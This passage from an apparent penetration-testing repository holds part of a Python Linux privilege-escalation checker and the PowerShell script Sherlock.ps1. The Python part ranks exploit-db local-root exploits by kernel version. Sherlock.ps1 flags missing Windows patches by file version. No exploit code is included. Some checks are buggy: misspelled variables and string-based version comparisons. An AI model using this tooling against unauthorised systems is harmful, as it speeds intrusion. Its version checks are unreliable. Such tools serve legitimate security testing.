"keywords":{"loc":["kernel"], "val":"kernel"}}, 261 | "Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}}, 262 | "Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 263 | "< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}}, 264 | "2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 265 | "2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}}, 266 | "Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}}, 267 | "Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 268 | "< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 269 | "2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}}, 270 | "2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}}, 271 | "2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 272 | "2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 273 | "Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 274 | "Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 275 | "PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}}, 276 | "2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 277 | "2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 278 | "2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 279 | "2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 280 | "2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 281 | "< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 282 | "< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 283 | "2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 284 | "2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 285 | "2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}}, 286 | "'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}}, 287 | "2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 288 | "Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}}, 289 | "<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}}, 290 | "Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}}, 291 | "< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 292 | "Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 293 | "Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 294 | "<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 295 | "< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 296 | "CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 297 | "CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 298 | "< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 299 | "Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}}, 300 | "2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 301 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 302 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 303 | "Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}}, 304 | "open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":{"minver":"0", "maxver":"99", "exploitdb":"25307", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 305 | "open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 306 | } 307 | 308 | # variable declaration 309 | os = sysInfo["OS"]["results"][0] 310 | version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0] 311 | langs = devTools["TOOLS"]["results"] 312 | procs = getAppProc["PROCS"]["results"] 313 | kernel = str(sysInfo["KERNEL"]["results"][0]) 314 | mount = driveInfo["MOUNT"]["results"] 315 | #pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future 316 | 317 | 318 | # lists to hold ranked, applicable sploits 319 | # note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks 320 | # all applicable exploits should be checked and this function could probably use some improvement 321 | avgprob = [] 322 | highprob = [] 323 | 324 | for sploit in sploits: 325 | lang = 0 # use to rank applicability of sploits 326 | keyword = sploits[sploit]["keywords"]["val"] 327 | sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"] 328 | # first check for kernell applicability 329 | if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]): 330 | # next check language applicability 331 | if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))): 332 | lang = 1 # language found, increase applicability score 333 | elif sploits[sploit]["lang"] == "sh": 334 | lang = 1 # language found, increase applicability score 335 | elif (sploits[sploit]["lang"] in str(langs)): 336 | lang = 1 # language found, increase applicability score 337 | if lang == 0: 338 | sploitout = sploitout + "**" # added mark if language not detected on system 339 | # next check keyword matches to determine if some sploits have a higher probability of success 340 | for loc in sploits[sploit]["keywords"]["loc"]: 341 | if loc == "proc": 342 | for proc in procs: 343 | if keyword in proc: 344 | highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability 345 | break 346 | break 347 | elif loc == "os": 348 | if (keyword in os) or (keyword in kernel): 349 | highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability 350 | break 351 | elif loc == "mnt": 352 | if keyword in mount: 353 | highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability 354 | break 355 | else: 356 | avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version 357 | 358 | print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!" 359 | print 360 | 361 | print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system" 362 | for exploit in highprob: 363 | print " - " + exploit 364 | print 365 | 366 | print " The following exploits are applicable to this kernel version and should be investigated as well" 367 | for exploit in avgprob: 368 | print " - " + exploit 369 | 370 | print 371 | print "Finished" 372 | print bigline 373 | -------------------------------------------------------------------------------- /priv_escalation/Windows/README.md: -------------------------------------------------------------------------------- 1 | ## Links do check 2 | 3 | http://www.fuzzysecurity.com/tutorials/16.html 4 | https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html 5 | -------------------------------------------------------------------------------- /priv_escalation/Windows/Sherlock.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | File: Sherlock.ps1 4 | Author: @_RastaMouse 5 | License: GNU General Public License v3.0 6 | 7 | #> 8 | 9 | <# 10 | 11 | RTM build reference, because I'm stupid and forget... 12 | 13 | 6002: Vista SP2/2008 SP2 14 | 7600: 7/2008 R2 15 | 7601: 7 SP1/2008 R2 SP1 16 | 9200: 8/2012 17 | 9600: 8.1/2012 R2 18 | 10240: 10 Threshold 19 | 10586: 10 Threshold 2 20 | 14393: 10 Redstone/2016 21 | 15063: 10 Redstone 2 22 | 16299: 10 Redstone 3 23 | 17134: 10 Redstone 4 24 | 25 | #> 26 | 27 | $Global:ExploitTable = $null 28 | 29 | function Get-FileVersionInfo ($FilePath) { 30 | 31 | $VersionInfo = (Get-Item $FilePath).VersionInfo 32 | $FileVersion = ( "{0}.{1}.{2}.{3}" -f $VersionInfo.FileMajorPart, $VersionInfo.FileMinorPart, $VersionInfo.FileBuildPart, $VersionInfo.FilePrivatePart ) 33 | 34 | return $FileVersion 35 | 36 | } 37 | 38 | function Get-InstalledSoftware($SoftwareName) { 39 | 40 | $SoftwareVersion = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -eq $SoftwareName } | Select-Object Version 41 | $SoftwareVersion = $SoftwareVersion.Version # I have no idea what I'm doing 42 | 43 | return $SoftwareVersion 44 | 45 | } 46 | 47 | function Get-Architecture { 48 | 49 | # This is the CPU architecture. Returns "64-bit" or "32-bit". 50 | $CPUArchitecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture 51 | 52 | # This is the process architecture, e.g. are we an x86 process running on a 64-bit system. Retuns "AMD64" or "x86". 53 | $ProcessArchitecture = $env:PROCESSOR_ARCHITECTURE 54 | 55 | return $CPUArchitecture, $ProcessArchitecture 56 | 57 | } 58 | 59 | function Get-CPUCoreCount { 60 | 61 | $CoreCount = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors 62 | 63 | return $CoreCount 64 | 65 | } 66 | 67 | function New-ExploitTable { 68 | 69 | # Create the table 70 | $Global:ExploitTable = New-Object System.Data.DataTable 71 | 72 | # Create the columns 73 | $Global:ExploitTable.Columns.Add("Title") 74 | $Global:ExploitTable.Columns.Add("MSBulletin") 75 | $Global:ExploitTable.Columns.Add("CVEID") 76 | $Global:ExploitTable.Columns.Add("Link") 77 | $Global:ExploitTable.Columns.Add("VulnStatus") 78 | 79 | # Add the exploits we are interested in. 80 | 81 | # MS10 82 | $Global:ExploitTable.Rows.Add("User Mode to Ring (KiTrap0D)","MS10-015","2010-0232","https://www.exploit-db.com/exploits/11199/") 83 | $Global:ExploitTable.Rows.Add("Task Scheduler .XML","MS10-092","2010-3338, 2010-3888","https://www.exploit-db.com/exploits/19930/") 84 | # MS13 85 | $Global:ExploitTable.Rows.Add("NTUserMessageCall Win32k Kernel Pool Overflow","MS13-053","2013-1300","https://www.exploit-db.com/exploits/33213/") 86 | $Global:ExploitTable.Rows.Add("TrackPopupMenuEx Win32k NULL Page","MS13-081","2013-3881","https://www.exploit-db.com/exploits/31576/") 87 | # MS14 88 | $Global:ExploitTable.Rows.Add("TrackPopupMenu Win32k Null Pointer Dereference","MS14-058","2014-4113","https://www.exploit-db.com/exploits/35101/") 89 | # MS15 90 | $Global:ExploitTable.Rows.Add("ClientCopyImage Win32k","MS15-051","2015-1701, 2015-2433","https://www.exploit-db.com/exploits/37367/") 91 | $Global:ExploitTable.Rows.Add("Font Driver Buffer Overflow","MS15-078","2015-2426, 2015-2433","https://www.exploit-db.com/exploits/38222/") 92 | # MS16 93 | $Global:ExploitTable.Rows.Add("'mrxdav.sys' WebDAV","MS16-016","2016-0051","https://www.exploit-db.com/exploits/40085/") 94 | $Global:ExploitTable.Rows.Add("Secondary Logon Handle","MS16-032","2016-0099","https://www.exploit-db.com/exploits/39719/") 95 | $Global:ExploitTable.Rows.Add("Windows Kernel-Mode Drivers EoP","MS16-034","2016-0093/94/95/96","https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?") 96 | $Global:ExploitTable.Rows.Add("Win32k Elevation of Privilege","MS16-135","2016-7255","https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135") 97 | # Miscs that aren't MS 98 | $Global:ExploitTable.Rows.Add("Nessus Agent 6.6.2 - 6.10.3","N/A","2017-7199","https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html") 99 | 100 | } 101 | 102 | function Set-ExploitTable ($MSBulletin, $VulnStatus) { 103 | 104 | if ( $MSBulletin -like "MS*" ) { 105 | 106 | $Global:ExploitTable | Where-Object { $_.MSBulletin -eq $MSBulletin 107 | 108 | } | ForEach-Object { 109 | 110 | $_.VulnStatus = $VulnStatus 111 | 112 | } 113 | 114 | } else { 115 | 116 | 117 | $Global:ExploitTable | Where-Object { $_.CVEID -eq $MSBulletin 118 | 119 | } | ForEach-Object { 120 | 121 | $_.VulnStatus = $VulnStatus 122 | 123 | } 124 | 125 | } 126 | 127 | } 128 | 129 | function Get-Results { 130 | 131 | $Global:ExploitTable 132 | 133 | } 134 | 135 | function Find-AllVulns { 136 | 137 | if ( !$Global:ExploitTable ) { 138 | 139 | $null = New-ExploitTable 140 | 141 | } 142 | 143 | Find-MS10015 144 | Find-MS10092 145 | Find-MS13053 146 | Find-MS13081 147 | Find-MS14058 148 | Find-MS15051 149 | Find-MS15078 150 | Find-MS16016 151 | Find-MS16032 152 | Find-MS16034 153 | Find-MS16135 154 | Find-CVE20177199 155 | 156 | Get-Results 157 | 158 | } 159 | 160 | function Find-MS10015 { 161 | 162 | $MSBulletin = "MS10-015" 163 | $Architecture = Get-Architecture 164 | 165 | if ( $Architecture[0] -eq "64-bit" ) { 166 | 167 | $VulnStatus = "Not supported on 64-bit systems" 168 | 169 | } Else { 170 | 171 | $Path = $env:windir + "\system32\ntoskrnl.exe" 172 | $VersionInfo = Get-FileVersionInfo($Path) 173 | $VersionInfo = $VersionInfo.Split(".") 174 | 175 | $Build = $VersionInfo[2] 176 | $Revision = $VersionInfo[3].Split(" ")[0] 177 | 178 | switch ( $Build ) { 179 | 180 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20591" ] } 181 | default { $VulnStatus = "Not Vulnerable" } 182 | 183 | } 184 | 185 | } 186 | 187 | Set-ExploitTable $MSBulletin $VulnStatus 188 | 189 | } 190 | 191 | function Find-MS10092 { 192 | 193 | $MSBulletin = "MS10-092" 194 | $Architecture = Get-Architecture 195 | 196 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 197 | 198 | $Path = $env:windir + "\system32\schedsvc.dll" 199 | 200 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 201 | 202 | $Path = $env:windir + "\sysnative\schedsvc.dll" 203 | 204 | } 205 | 206 | $VersionInfo = Get-FileVersionInfo($Path) 207 | $VersionInfo = $VersionInfo.Split(".") 208 | 209 | $Build = $VersionInfo[2] 210 | $Revision = $VersionInfo[3].Split(" ")[0] 211 | 212 | switch ( $Build ) { 213 | 214 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20830" ] } 215 | default { $VulnStatus = "Not Vulnerable" } 216 | 217 | } 218 | 219 | Set-ExploitTable $MSBulletin $VulnStatus 220 | 221 | } 222 | 223 | function Find-MS13053 { 224 | 225 | $MSBulletin = "MS13-053" 226 | $Architecture = Get-Architecture 227 | 228 | if ( $Architecture[0] -eq "64-bit" ) { 229 | 230 | $VulnStatus = "Not supported on 64-bit systems" 231 | 232 | } Else { 233 | 234 | $Path = $env:windir + "\system32\win32k.sys" 235 | $VersionInfo = Get-FileVersionInfo($Path) 236 | $VersionInfo = $VersionInfo.Split(".") 237 | 238 | $Build = $VersionInfo[2] 239 | $Revision = $VersionInfo[3].Split(" ")[0] 240 | 241 | switch ( $Build ) { 242 | 243 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "17000" ] } 244 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22348" ] } 245 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20732" ] } 246 | default { $VulnStatus = "Not Vulnerable" } 247 | 248 | } 249 | 250 | } 251 | 252 | Set-ExploitTable $MSBulletin $VulnStatus 253 | 254 | } 255 | 256 | function Find-MS13081 { 257 | 258 | $MSBulletin = "MS13-081" 259 | $Architecture = Get-Architecture 260 | 261 | if ( $Architecture[0] -eq "64-bit" ) { 262 | 263 | $VulnStatus = "Not supported on 64-bit systems" 264 | 265 | } Else { 266 | 267 | $Path = $env:windir + "\system32\win32k.sys" 268 | $VersionInfo = Get-FileVersionInfo($Path) 269 | $VersionInfo = $VersionInfo.Split(".") 270 | 271 | $Build = $VersionInfo[2] 272 | $Revision = $VersionInfo[3].Split(" ")[0] 273 | 274 | switch ( $Build ) { 275 | 276 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] } 277 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22435" ] } 278 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20807" ] } 279 | default { $VulnStatus = "Not Vulnerable" } 280 | 281 | } 282 | 283 | } 284 | 285 | Set-ExploitTable $MSBulletin $VulnStatus 286 | 287 | } 288 | 289 | function Find-MS14058 { 290 | 291 | $MSBulletin = "MS14-058" 292 | $Architecture = Get-Architecture 293 | 294 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 295 | 296 | $Path = $env:windir + "\system32\win32k.sys" 297 | 298 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 299 | 300 | $Path = $env:windir + "\sysnative\win32k.sys" 301 | 302 | } 303 | 304 | $VersionInfo = Get-FileVersionInfo($Path) 305 | $VersionInfo = $VersionInfo.Split(".") 306 | 307 | $Build = $VersionInfo[2] 308 | $Revision = $VersionInfo[3].Split(" ")[0] 309 | 310 | switch ( $Build ) { 311 | 312 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] } 313 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] } 314 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] } 315 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] } 316 | default { $VulnStatus = "Not Vulnerable" } 317 | 318 | } 319 | 320 | Set-ExploitTable $MSBulletin $VulnStatus 321 | 322 | } 323 | 324 | function Find-MS15051 { 325 | 326 | $MSBulletin = "MS15-051" 327 | $Architecture = Get-Architecture 328 | 329 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 330 | 331 | $Path = $env:windir + "\system32\win32k.sys" 332 | 333 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 334 | 335 | $Path = $env:windir + "\sysnative\win32k.sys" 336 | 337 | } 338 | 339 | $VersionInfo = Get-FileVersionInfo($Path) 340 | $VersionInfo = $VersionInfo.Split(".") 341 | 342 | $Build = $VersionInfo[2] 343 | $Revision = $VersionInfo[3].Split(" ")[0] 344 | 345 | switch ( $Build ) { 346 | 347 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18000" ] } 348 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] } 349 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] } 350 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] } 351 | default { $VulnStatus = "Not Vulnerable" } 352 | 353 | } 354 | 355 | Set-ExploitTable $MSBulletin $VulnStatus 356 | 357 | } 358 | 359 | function Find-MS15078 { 360 | 361 | $MSBulletin = "MS15-078" 362 | 363 | $Path = $env:windir + "\system32\atmfd.dll" 364 | $VersionInfo = Get-FileVersionInfo($Path) 365 | $VersionInfo = $VersionInfo.Split(" ") 366 | 367 | $Revision = $VersionInfo[2] 368 | 369 | switch ( $Revision ) { 370 | 371 | 243 { $VulnStatus = "Appears Vulnerable" } 372 | default { $VulnStatus = "Not Vulnerable" } 373 | 374 | } 375 | 376 | Set-ExploitTable $MSBulletin $VulnStatus 377 | 378 | } 379 | 380 | function Find-MS16016 { 381 | 382 | $MSBulletin = "MS16-016" 383 | $Architecture = Get-Architecture 384 | 385 | if ( $Architecture[0] -eq "64-bit" ) { 386 | 387 | $VulnStatus = "Not supported on 64-bit systems" 388 | 389 | } Else { 390 | 391 | $Path = $env:windir + "\system32\drivers\mrxdav.sys" 392 | $VersionInfo = Get-FileVersionInfo($Path) 393 | $VersionInfo = $VersionInfo.Split(".") 394 | 395 | $Build = $VersionInfo[2] 396 | $Revision = $VersionInfo[3].Split(" ")[0] 397 | 398 | switch ( $Build ) { 399 | 400 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16000" ] } 401 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "23317" ] } 402 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21738" ] } 403 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18189" ] } 404 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16683" ] } 405 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "103" ] } 406 | default { $VulnStatus = "Not Vulnerable" } 407 | 408 | } 409 | 410 | } 411 | 412 | Set-ExploitTable $MSBulletin $VulnStatus 413 | 414 | } 415 | 416 | function Find-MS16032 { 417 | 418 | $MSBulletin = "MS16-032" 419 | 420 | $CPUCount = Get-CPUCoreCount 421 | 422 | if ( $CPUCount -eq "1" ) { 423 | 424 | $VulnStatus = "Not Supported on single-core systems" 425 | 426 | } Else { 427 | 428 | $Architecture = Get-Architecture 429 | 430 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 431 | 432 | $Path = $env:windir + "\system32\seclogon.dll" 433 | 434 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 435 | 436 | $Path = $env:windir + "\sysnative\seclogon.dll" 437 | 438 | } 439 | 440 | $VersionInfo = Get-FileVersionInfo($Path) 441 | 442 | $VersionInfo = $VersionInfo.Split(".") 443 | 444 | $Build = [int]$VersionInfo[2] 445 | $Revision = [int]$VersionInfo[3].Split(" ")[0] 446 | 447 | switch ( $Build ) { 448 | 449 | 6002 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 19598 -Or ( $Revision -ge 23000 -And $Revision -le 23909 ) ] } 450 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19148 ] } 451 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 19148 -Or ( $Revision -ge 23000 -And $Revision -le 23347 ) ] } 452 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 17649 -Or ( $Revision -ge 21000 -And $Revision -le 21767 ) ] } 453 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 18230 ] } 454 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 16724 ] } 455 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 161 ] } 456 | default { $VulnStatus = "Not Vulnerable" } 457 | 458 | } 459 | } 460 | 461 | Set-ExploitTable $MSBulletin $VulnStatus 462 | 463 | } 464 | 465 | function Find-MS16034 { 466 | 467 | $MSBulletin = "MS16-034" 468 | 469 | $Architecture = Get-Architecture 470 | 471 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 472 | 473 | $Path = $env:windir + "\system32\win32k.sys" 474 | 475 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 476 | 477 | $Path = $env:windir + "\sysnative\win32k.sys" 478 | 479 | } 480 | 481 | $VersionInfo = Get-FileVersionInfo($Path) 482 | 483 | $VersionInfo = $VersionInfo.Split(".") 484 | 485 | $Build = [int]$VersionInfo[2] 486 | $Revision = [int]$VersionInfo[3].Split(" ")[0] 487 | 488 | switch ( $Build ) { 489 | 490 | 6002 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 19597 -Or $Revision -lt 23908 ] } 491 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 19145 -Or $Revision -lt 23346 ] } 492 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 17647 -Or $Revision -lt 21766 ] } 493 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 18228 ] } 494 | default { $VulnStatus = "Not Vulnerable" } 495 | 496 | } 497 | 498 | Set-ExploitTable $MSBulletin $VulnStatus 499 | 500 | } 501 | 502 | function Find-CVE20177199 { 503 | 504 | $CVEID = "2017-7199" 505 | $SoftwareVersion = Get-InstalledSoftware "Nessus Agent" 506 | 507 | if ( !$SoftwareVersion ) { 508 | 509 | $VulnStatus = "Not Vulnerable" 510 | 511 | } else { 512 | 513 | $SoftwareVersion = $SoftwareVersion.Split(".") 514 | 515 | $Major = [int]$SoftwareVersion[0] 516 | $Minor = [int]$SoftwareVersion[1] 517 | $Build = [int]$SoftwareVersion[2] 518 | 519 | switch( $Major ) { 520 | 521 | 6 { 